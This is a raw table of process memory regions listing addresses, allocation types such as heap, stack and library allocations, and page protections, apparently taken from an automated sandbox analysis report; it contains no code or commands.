||
|
3A22000
|
heap
|
page read and write
|
||
|
272B000
|
heap
|
page read and write
|
||
|
42D000
|
heap
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
1C0A0000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
542A000
|
heap
|
page read and write
|
||
|
2A55000
|
trusted library allocation
|
page read and write
|
||
|
5AB2000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
1AD17000
|
heap
|
page read and write
|
||
|
1A26F000
|
stack
|
page read and write
|
||
|
29FF000
|
stack
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
3660000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
44A000
|
heap
|
page read and write
|
||
|
449000
|
heap
|
page read and write
|
||
|
30F1000
|
trusted library allocation
|
page read and write
|
||
|
4AA000
|
heap
|
page read and write
|
||
|
1B090000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
5A9C000
|
heap
|
page read and write
|
||
|
5426000
|
heap
|
page read and write
|
||
|
550F000
|
heap
|
page read and write
|
||
|
4C24000
|
heap
|
page read and write
|
||
|
443000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
473000
|
remote allocation
|
page execute and read and write
|
||
|
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
|
39C8000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
14E000
|
heap
|
page read and write
|
||
|
373000
|
direct allocation
|
page read and write
|
||
|
2A25000
|
trusted library allocation
|
page read and write
|
||
|
5426000
|
heap
|
page read and write
|
||
|
1D20000
|
heap
|
page read and write
|
||
|
39D3000
|
heap
|
page read and write
|
||
|
3B0000
|
trusted library allocation
|
page read and write
|
||
|
3B28000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
46A000
|
heap
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
3F33000
|
heap
|
page read and write
|
||
|
16D000
|
heap
|
page read and write
|
||
|
5501000
|
heap
|
page read and write
|
||
|
2A5D000
|
trusted library allocation
|
page read and write
|
||
|
1AC57000
|
heap
|
page read and write
|
||
|
541C000
|
heap
|
page read and write
|
||
|
464F000
|
stack
|
page read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
5AA7000
|
heap
|
page read and write
|
||
|
3F90000
|
trusted library allocation
|
page read and write
|
||
|
15C000
|
heap
|
page read and write
|
||
|
7FE89920000
|
trusted library allocation
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
1AC41000
|
heap
|
page read and write
|
||
|
5AC8000
|
heap
|
page read and write
|
||
|
5911000
|
heap
|
page read and write
|
||
|
38D4000
|
heap
|
page read and write
|
||
|
40E000
|
heap
|
page read and write
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
1ACA2000
|
heap
|
page read and write
|
||
|
4C2E000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
5AB2000
|
heap
|
page read and write
|
||
|
2A35000
|
trusted library allocation
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
1C089000
|
heap
|
page read and write
|
||
|
1C44000
|
heap
|
page read and write
|
||
|
23DB000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
3A8F000
|
heap
|
page read and write
|
||
|
357000
|
heap
|
page read and write
|
||
|
1CF5000
|
heap
|
page read and write
|
||
|
D8000
|
heap
|
page read and write
|
||
|
43D0000
|
heap
|
page read and write
|
||
|
407000
|
heap
|
page read and write
|
||
|
4C47000
|
heap
|
page read and write
|
||
|
2998000
|
trusted library allocation
|
page read and write
|
||
|
1AEA0000
|
heap
|
page read and write
|
||
|
3A33000
|
heap
|
page read and write
|
||
|
5501000
|
heap
|
page read and write
|
||
|
3F1000
|
heap
|
page read and write
|
||
|
276000
|
stack
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
540F000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
203000
|
stack
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
1EF0000
|
heap
|
page read and write
|
||
|
439000
|
heap
|
page read and write
|
||
|
16E000
|
heap
|
page read and write
|
||
|
43E000
|
heap
|
page read and write
|
||
|
5ACC000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
23D9000
|
heap
|
page read and write
|
||
|
3F04000
|
heap
|
page read and write
|
||
|
1F70000
|
heap
|
page read and write
|
||
|
1B4BC000
|
stack
|
page read and write
|
||
|
7FE89A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E99000
|
heap
|
page read and write
|
||
|
3E95000
|
heap
|
page read and write
|
||
|
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
|
34E2000
|
trusted library allocation
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
251F000
|
stack
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
3990000
|
heap
|
page read and write
|
||
|
4C4A000
|
heap
|
page read and write
|
||
|
5470000
|
heap
|
page read and write
|
||
|
1C0A6000
|
heap
|
page read and write
|
||
|
5424000
|
heap
|
page read and write
|
||
|
3A8F000
|
heap
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
1CA1F000
|
stack
|
page read and write
|
||
|
5850000
|
heap
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
2724000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
3A11000
|
heap
|
page read and write
|
||
|
3F13000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89914000
|
trusted library allocation
|
page read and write
|
||
|
480000
|
direct allocation
|
page read and write
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
3DF0000
|
heap
|
page read and write
|
||
|
1C2C5000
|
heap
|
page read and write
|
||
|
7FE89923000
|
trusted library allocation
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
220A000
|
stack
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page read and write
|
||
|
54EF000
|
heap
|
page read and write
|
||
|
2A56000
|
trusted library allocation
|
page read and write
|
||
|
2A4F000
|
trusted library allocation
|
page read and write
|
||
|
38B000
|
direct allocation
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
2A2D000
|
trusted library allocation
|
page read and write
|
||
|
598E000
|
heap
|
page read and write
|
||
|
409B000
|
trusted library allocation
|
page read and write
|
||
|
308F000
|
stack
|
page read and write
|
||
|
CA000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
3F03000
|
heap
|
page read and write
|
||
|
2D2000
|
heap
|
page read and write
|
||
|
4800000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
4C43000
|
heap
|
page read and write
|
||
|
1C64B000
|
stack
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
1DE4000
|
heap
|
page read and write
|
||
|
5CB4000
|
heap
|
page read and write
|
||
|
330000
|
direct allocation
|
page read and write
|
||
|
408C000
|
stack
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
2A57000
|
trusted library allocation
|
page read and write
|
||
|
39D3000
|
heap
|
page read and write
|
||
|
3F29000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
541E000
|
heap
|
page read and write
|
||
|
29A4000
|
trusted library allocation
|
page read and write
|
||
|
57FA000
|
heap
|
page read and write
|
||
|
147000
|
heap
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page read and write
|
||
|
1DA4000
|
heap
|
page read and write
|
||
|
3F13000
|
heap
|
page read and write
|
||
|
59C4000
|
heap
|
page read and write
|
||
|
36C0000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2150000
|
heap
|
page read and write
|
||
|
1DE7000
|
direct allocation
|
page read and write
|
||
|
3A3D000
|
stack
|
page read and write
|
||
|
4940000
|
trusted library allocation
|
page read and write
|
||
|
A1A8000
|
trusted library allocation
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
1DB0000
|
heap
|
page read and write
|
||
|
377000
|
direct allocation
|
page read and write
|
||
|
5AA1000
|
heap
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
1ADCF000
|
stack
|
page read and write
|
||
|
34D9000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
5428000
|
heap
|
page read and write
|
||
|
1AC52000
|
heap
|
page read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
35F000
|
trusted library allocation
|
page read and write
|
||
|
5651000
|
heap
|
page read and write
|
||
|
1B43B000
|
stack
|
page read and write
|
||
|
1F70000
|
heap
|
page read and write
|
||
|
1DE7000
|
direct allocation
|
page read and write
|
||
|
7FE89912000
|
trusted library allocation
|
page read and write
|
||
|
3B09000
|
trusted library allocation
|
page read and write
|
||
|
23D1000
|
heap
|
page read and write
|
||
|
5C9F000
|
heap
|
page read and write
|
||
|
3F70000
|
trusted library allocation
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
2A29000
|
trusted library allocation
|
page read and write
|
||
|
5CAD000
|
heap
|
page read and write
|
||
|
59BB000
|
heap
|
page read and write
|
||
|
498000
|
heap
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
15D000
|
heap
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
7FE89ACC000
|
trusted library allocation
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
372F000
|
stack
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
CE000
|
heap
|
page read and write
|
||
|
5990000
|
heap
|
page read and write
|
||
|
6050000
|
trusted library allocation
|
page read and write
|
||
|
5AC8000
|
heap
|
page read and write
|
||
|
E0000
|
heap
|
page read and write
|
||
|
2331000
|
trusted library allocation
|
page read and write
|
||
|
15D000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
21E0000
|
heap
|
page execute and read and write
|
||
|
54ED000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
430000
|
heap
|
page read and write
|
||
|
5C0000
|
direct allocation
|
page read and write
|
||
|
2E1000
|
heap
|
page read and write
|
||
|
3E99000
|
heap
|
page read and write
|
||
|
5CB4000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
1B094000
|
heap
|
page read and write
|
||
|
2D7B000
|
heap
|
page read and write
|
||
|
1C450000
|
heap
|
page read and write
|
||
|
7FE89B14000
|
trusted library allocation
|
page read and write
|
||
|
1C40000
|
heap
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C70000
|
trusted library allocation
|
page read and write
|
||
|
3A33000
|
heap
|
page read and write
|
||
|
15D000
|
heap
|
page read and write
|
||
|
2A27000
|
trusted library allocation
|
page read and write
|
||
|
476000
|
heap
|
page read and write
|
||
|
7FE8991D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B8C000
|
stack
|
page read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
5428000
|
heap
|
page read and write
|
||
|
3EC000
|
heap
|
page read and write
|
||
|
292000
|
stack
|
page read and write
|
||
|
1C3B1000
|
heap
|
page read and write
|
||
|
4B5D000
|
heap
|
page read and write
|
||
|
231E000
|
stack
|
page read and write | page guard
|
||
|
2A29000
|
trusted library allocation
|
page read and write
|
||
|
409F000
|
stack
|
page read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
1C3A0000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
416000
|
heap
|
page read and write
|
||
|
3432000
|
trusted library allocation
|
page read and write
|
||
|
54FB000
|
heap
|
page read and write
|
||
|
7FE89B14000
|
trusted library allocation
|
page read and write
|
||
|
5415000
|
heap
|
page read and write
|
||
|
83A8000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
45B000
|
heap
|
page read and write
|
||
|
5CA6000
|
heap
|
page read and write
|
||
|
1E54000
|
heap
|
page read and write
|
||
|
15A000
|
heap
|
page read and write
|
||
|
272000
|
stack
|
page read and write
|
||
|
2C6000
|
heap
|
page read and write
|
||
|
5501000
|
heap
|
page read and write
|
||
|
5704000
|
heap
|
page read and write
|
||
|
5800000
|
heap
|
page read and write
|
||
|
54F9000
|
heap
|
page read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
3A33000
|
heap
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
||
|
30B000
|
heap
|
page read and write
|
||
|
34D7000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AF4000
|
trusted library allocation
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
487000
|
direct allocation
|
page read and write
|
||
|
60000
|
heap
|
page read and write
|
||
|
3CD000
|
heap
|
page read and write
|
||
|
3F02000
|
heap
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
1C60000
|
heap
|
page read and write
|
||
|
2D6000
|
heap
|
page read and write
|
||
|
1C40000
|
trusted library allocation
|
page read and write
|
||
|
1C2FB000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
4CC6000
|
heap
|
page read and write
|
||
|
2A5A000
|
trusted library allocation
|
page read and write
|
||
|
46AE000
|
stack
|
page read and write
|
||
|
1C2C0000
|
heap
|
page read and write
|
||
|
4C3F000
|
heap
|
page read and write
|
||
|
416000
|
heap
|
page read and write
|
||
|
1D2B000
|
heap
|
page read and write
|
||
|
5CB2000
|
heap
|
page read and write
|
||
|
2A23000
|
trusted library allocation
|
page read and write
|
||
|
399C000
|
heap
|
page read and write
|
||
|
1A8BE000
|
stack
|
page read and write
|
||
|
3F2A000
|
heap
|
page read and write
|
||
|
7FE899D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C35D000
|
heap
|
page read and write
|
||
|
5BE9000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
DF000
|
heap
|
page read and write
|
||
|
43DB000
|
stack
|
page read and write
|
||
|
660000
|
direct allocation
|
page read and write
|
||
|
5428000
|
heap
|
page read and write
|
||
|
3505000
|
trusted library allocation
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
3820000
|
trusted library allocation
|
page read and write
|
||
|
1BF35000
|
heap
|
page read and write
|
||
|
2440000
|
heap
|
page execute and read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
3F2000
|
heap
|
page read and write
|
||
|
363E000
|
heap
|
page read and write
|
||
|
7FE89AF2000
|
trusted library allocation
|
page read and write
|
||
|
47C0000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
1DF3000
|
direct allocation
|
page read and write
|
||
|
5478000
|
heap
|
page read and write
|
||
|
5C78000
|
heap
|
page read and write
|
||
|
550F000
|
heap
|
page read and write
|
||
|
1C80000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
250000
|
heap
|
page read and write
|
||
|
59C9000
|
heap
|
page read and write
|
||
|
41E000
|
heap
|
page read and write
|
||
|
640000
|
direct allocation
|
page read and write
|
||
|
270C000
|
trusted library allocation
|
page read and write
|
||
|
7FE89923000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
1DE9000
|
heap
|
page read and write
|
||
|
119000
|
heap
|
page read and write
|
||
|
5CA3000
|
heap
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
||
|
54EF000
|
heap
|
page read and write
|
||
|
5690000
|
heap
|
page read and write
|
||
|
2A5B000
|
trusted library allocation
|
page read and write
|
||
|
5A9F000
|
heap
|
page read and write
|
||
|
5707000
|
heap
|
page read and write
|
||
|
7FE89AB2000
|
trusted library allocation
|
page read and write
|
||
|
541A000
|
heap
|
page read and write
|
||
|
3F63000
|
heap
|
page read and write
|
||
|
550F000
|
heap
|
page read and write
|
||
|
5424000
|
heap
|
page read and write
|
||
|
3F13000
|
heap
|
page read and write
|
||
|
1C06E000
|
stack
|
page read and write
|
||
|
3EBD000
|
heap
|
page read and write
|
||
|
59C9000
|
heap
|
page read and write
|
||
|
3CA000
|
heap
|
page read and write
|
||
|
1B1AF000
|
stack
|
page read and write
|
||
|
4099000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE899CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
302C000
|
stack
|
page read and write
|
||
|
41DE000
|
stack
|
page read and write
|
||
|
3C8000
|
heap
|
page read and write
|
||
|
54FB000
|
heap
|
page read and write
|
||
|
5AB2000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
4B1000
|
heap
|
page read and write
|
||
|
1B18D000
|
stack
|
page read and write
|
||
|
3F2C000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
3F8E000
|
stack
|
page read and write
|
||
|
483000
|
direct allocation
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
121E0000
|
trusted library allocation
|
page read and write
|
||
|
2BB000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
7FE89ACC000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F1000
|
heap
|
page read and write
|
||
|
2A48000
|
trusted library allocation
|
page read and write
|
||
|
7FE89920000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
5ABD000
|
heap
|
page read and write
|
||
|
5426000
|
heap
|
page read and write
|
||
|
43B000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
7FE89B18000
|
trusted library allocation
|
page read and write
|
||
|
1DE7000
|
direct allocation
|
page read and write
|
||
|
13D000
|
heap
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
557000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
8DA8000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
5851000
|
heap
|
page read and write
|
||
|
3F7000
|
heap
|
page read and write
|
||
|
369000
|
heap
|
page read and write
|
||
|
1AB59000
|
stack
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
3A46000
|
heap
|
page read and write
|
||
|
EC000
|
heap
|
page read and write
|
||
|
2026000
|
heap
|
page read and write
|
||
|
2550000
|
heap
|
page execute and read and write
|
||
|
4C43000
|
heap
|
page read and write
|
||
|
37B0000
|
heap
|
page read and write
|
||
|
31AC000
|
stack
|
page read and write
|
||
|
3EE5000
|
heap
|
page read and write
|
||
|
12F000
|
heap
|
page read and write
|
||
|
290000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
5CA6000
|
heap
|
page read and write
|
||
|
29C000
|
stack
|
page read and write
|
||
|
2AD000
|
heap
|
page read and write
|
||
|
3128000
|
trusted library allocation
|
page read and write
|
||
|
1C42A000
|
stack
|
page read and write
|
||
|
594C000
|
heap
|
page read and write
|
||
|
3BA000
|
heap
|
page read and write
|
||
|
541C000
|
heap
|
page read and write
|
||
|
1B000000
|
heap
|
page read and write
|
||
|
2A4E000
|
trusted library allocation
|
page read and write
|
||
|
5A4C000
|
heap
|
page read and write
|
||
|
5CB4000
|
heap
|
page read and write
|
||
|
3A7000
|
heap
|
page read and write
|
||
|
5704000
|
heap
|
page read and write
|
||
|
3A11000
|
heap
|
page read and write
|
||
|
598E000
|
heap
|
page read and write
|
||
|
550A000
|
heap
|
page read and write
|
||
|
2717000
|
trusted library allocation
|
page read and write
|
||
|
54FE000
|
heap
|
page read and write
|
||
|
1B209000
|
stack
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5AB0000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4E50000
|
heap
|
page read and write
|
||
|
2370000
|
trusted library allocation
|
page execute read
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
25FE000
|
stack
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
3F2000
|
heap
|
page read and write
|
||
|
CF000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA4000
|
heap
|
page read and write
|
||
|
57FA000
|
heap
|
page read and write
|
||
|
46B0000
|
heap
|
page read and write
|
||
|
1A628000
|
heap
|
page execute and read and write
|
||
|
12F000
|
heap
|
page read and write
|
||
|
542C000
|
heap
|
page read and write
|
||
|
3DF4000
|
heap
|
page read and write
|
||
|
1C6DE000
|
stack
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
2A4E000
|
trusted library allocation
|
page read and write
|
||
|
2ED0000
|
trusted library allocation
|
page read and write
|
||
|
2A5D000
|
trusted library allocation
|
page read and write
|
||
|
550A000
|
heap
|
page read and write
|
||
|
307000
|
heap
|
page read and write
|
||
|
15D000
|
heap
|
page read and write
|
||
|
3650000
|
trusted library allocation
|
page read and write
|
||
|
224F000
|
stack
|
page read and write
|
||
|
540F000
|
heap
|
page read and write
|
||
|
5CA6000
|
heap
|
page read and write
|
||
|
4B6000
|
heap
|
page read and write
|
||
|
1DE0000
|
heap
|
page read and write
|
||
|
3A46000
|
heap
|
page read and write
|
||
|
3659000
|
trusted library allocation
|
page read and write
|
||
|
2A51000
|
trusted library allocation
|
page read and write
|
||
|
56FB000
|
heap
|
page read and write
|
||
|
2A2D000
|
trusted library allocation
|
page read and write
|
||
|
1AC64000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
23C7000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
5AB9000
|
heap
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page read and write
|
||
|
5950000
|
heap
|
page read and write
|
||
|
30B000
|
stack
|
page read and write
|
||
|
1F70000
|
heap
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
58BD000
|
heap
|
page read and write
|
||
|
262D000
|
trusted library allocation
|
page read and write
|
||
|
388000
|
heap
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
1ACD1000
|
heap
|
page read and write
|
||
|
49D000
|
direct allocation
|
page read and write
|
||
|
5A00000
|
heap
|
page read and write
|
||
|
5988000
|
heap
|
page read and write
|
||
|
1C10000
|
trusted library allocation
|
page read and write
|
||
|
4B17000
|
heap
|
page read and write
|
||
|
3090000
|
remote allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
457000
|
heap
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
54F9000
|
heap
|
page read and write
|
||
|
34D5000
|
trusted library allocation
|
page read and write
|
||
|
5CA6000
|
heap
|
page read and write
|
||
|
23D1000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
3DDF000
|
stack
|
page read and write
|
||
|
541C000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
404000
|
heap
|
page read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
1DD6000
|
heap
|
page read and write
|
||
|
5CB2000
|
heap
|
page read and write
|
||
|
3F00000
|
heap
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
2A4A000
|
trusted library allocation
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
2390000
|
heap
|
page read and write
|
||
|
421000
|
heap
|
page read and write
|
||
|
457F000
|
stack
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
44B000
|
heap
|
page read and write
|
||
|
405000
|
heap
|
page read and write
|
||
|
5CB2000
|
heap
|
page read and write
|
||
|
253000
|
stack
|
page read and write
|
||
|
109000
|
heap
|
page read and write
|
||
|
129000
|
heap
|
page read and write
|
||
|
59C4000
|
heap
|
page read and write
|
||
|
109000
|
heap
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
7FE8991D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E3F000
|
stack
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
3EBD000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2A2B000
|
trusted library allocation
|
page read and write
|
||
|
3EBD000
|
heap
|
page read and write
|
||
|
2A23000
|
trusted library allocation
|
page read and write
|
||
|
5910000
|
heap
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3646000
|
heap
|
page read and write
|
||
|
5C78000
|
heap
|
page read and write
|
||
|
4C3F000
|
heap
|
page read and write
|
||
|
1D80000
|
direct allocation
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
5ADB000
|
heap
|
page read and write
|
||
|
5CAA000
|
heap
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
42F000
|
heap
|
page read and write
|
||
|
597A000
|
heap
|
page read and write
|
||
|
51A8000
|
trusted library allocation
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
1E7F000
|
stack
|
page read and write
|
||
|
7FE899F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
3990000
|
trusted library allocation
|
page read and write
|
||
|
3EC3000
|
heap
|
page read and write
|
||
|
350000
|
trusted library allocation
|
page read and write
|
||
|
5AA1000
|
heap
|
page read and write
|
||
|
4C3E000
|
heap
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
1C0C5000
|
heap
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
3BB000
|
heap
|
page read and write
|
||
|
54EF000
|
heap
|
page read and write
|
||
|
401000
|
heap
|
page read and write
|
||
|
70000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
4B19000
|
heap
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
1B90000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
2448000
|
heap
|
page execute and read and write
|
||
|
3700000
|
heap
|
page read and write
|
||
|
298C000
|
trusted library allocation
|
page read and write
|
||
|
5B11000
|
heap
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
4C2C000
|
heap
|
page read and write
|
||
|
694000
|
heap
|
page read and write
|
||
|
4C3A000
|
heap
|
page read and write
|
||
|
13C000
|
stack
|
page read and write
|
||
|
1AC5B000
|
heap
|
page read and write
|
||
|
5704000
|
heap
|
page read and write
|
||
|
38D000
|
direct allocation
|
page read and write
|
||
|
EC000
|
heap
|
page read and write
|
||
|
1D25000
|
heap
|
page read and write
|
||
|
5986000
|
heap
|
page read and write
|
||
|
2D1000
|
heap
|
page read and write
|
||
|
4350000
|
heap
|
page read and write
|
||
|
41A000
|
heap
|
page read and write
|
||
|
247E000
|
heap
|
page execute and read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
5B10000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1D5B000
|
heap
|
page read and write
|
||
|
132000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
503000
|
heap
|
page read and write
|
||
|
1A2EC000
|
stack
|
page read and write
|
||
|
41C000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
5AA7000
|
heap
|
page read and write
|
||
|
5418000
|
heap
|
page read and write
|
||
|
42A000
|
heap
|
page read and write
|
||
|
34D3000
|
trusted library allocation
|
page read and write
|
||
|
29C2000
|
trusted library allocation
|
page read and write
|
||
|
1C8C0000
|
heap
|
page read and write
|
||
|
3FD000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
5418000
|
heap
|
page read and write
|
||
|
59C9000
|
heap
|
page read and write
|
||
|
5AAA000
|
heap
|
page read and write
|
||
|
5706000
|
heap
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
1C7BD000
|
stack
|
page read and write
|
